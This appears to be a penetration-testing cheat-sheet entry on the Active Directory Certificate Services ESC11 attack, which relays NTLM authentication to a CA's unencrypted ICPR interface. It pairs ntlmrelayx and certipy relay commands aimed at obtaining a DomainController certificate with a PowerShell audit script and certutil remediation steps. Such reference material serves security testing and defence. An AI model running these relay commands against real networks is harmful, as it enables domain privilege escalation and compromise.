
Active Directory - Certificate ESC11

ESC11 - Relaying NTLM to ICPR

The CA does not enforce encryption for ICPR (certificate request RPC interface) requests and its Request Disposition is set to Issue, so NTLM authentication relayed to the CA's RPC endpoint is enough to obtain a certificate.

Requirements:

Exploitation:

  1. Look for `Enforce Encryption for Requests: Disabled` in the output of `certipy find -u user@dc1.lab.local -p 'REDACTED' -dc-ip 10.10.10.10 -stdout`.
  2. Set up a relay using Impacket's ntlmrelayx (or `certipy relay`) and trigger a connection to it.

    ntlmrelayx.py -t rpc://10.10.10.10 -rpc-mode ICPR -icpr-ca-name lab-DC-CA -smb2support
    certipy relay -target rpc://dc.domain.local -ca 'DOMAIN-CA' -template DomainController

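The condition checked in step 1 corresponds to the `IF_ENFORCEENCRYPTICERTREQUEST` bit (0x200) of the CA's `InterfaceFlags` value. The following PowerShell audit script is an added example, not code from the original page or from the certipy/Impacket projects; it reads that value from the CA's registry configuration (`HKLM:\SYSTEM\CurrentControlSet\Services\CertSvc\Configuration\<CA name>`) and reports any CA where ESC11 applies. The `-CAName` parameter is a hypothetical convenience added here; the registry path, bit value and `certutil` remediation are the documented AD CS settings.

```powershell
# Added example (not part of the original page): audit a CA for ESC11 by
# checking whether IF_ENFORCEENCRYPTICERTREQUEST is set in InterfaceFlags.
# Run locally on the CA host with administrative rights.

$IF_ENFORCEENCRYPTICERTREQUEST = 0x200   # documented interface-flag bit

function Test-IcprEncryptionEnforced {
    [CmdletBinding()]
    param(
        # Hypothetical parameter: limit the check to a single CA name.
        [string]$CAName
    )

    $base = 'HKLM:\SYSTEM\CurrentControlSet\Services\CertSvc\Configuration'
    $caKeys = Get-ChildItem -Path $base -ErrorAction Stop
    if ($CAName) {
        $caKeys = $caKeys | Where-Object { $_.PSChildName -eq $CAName }
    }

    foreach ($key in $caKeys) {
        # Only CA configuration subkeys carry an InterfaceFlags DWORD.
        $props = Get-ItemProperty -Path $key.PSPath -Name InterfaceFlags -ErrorAction SilentlyContinue
        if ($null -eq $props) { continue }
        $flags = [int]$props.InterfaceFlags

        $enforced = ($flags -band $IF_ENFORCEENCRYPTICERTREQUEST) -ne 0
        if ($enforced) {
            $finding = 'OK: encryption enforced for ICPR requests'
        } else {
            $finding = 'ESC11: Enforce Encryption for Requests is disabled'
        }

        [pscustomobject]@{
            CA                 = $key.PSChildName
            InterfaceFlags     = ('0x{0:X}' -f $flags)
            EncryptionEnforced = $enforced
            Finding            = $finding
        }
    }
}

Test-IcprEncryptionEnforced | Format-Table -AutoSize

# Remediation on an affected CA (documented certutil syntax). The new flag
# only takes effect after the certificate service is restarted:
#   certutil -setreg CA\InterfaceFlags +IF_ENFORCEENCRYPTICERTREQUEST
#   Restart-Service -Name CertSvc
# Verify afterwards with:
#   certutil -getreg CA\InterfaceFlags
```

The script reads the same flag that `certipy find` reports as `Enforce Encryption for Requests`, so it can be used to confirm a finding from the domain-join side before and after applying the `certutil` change.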

References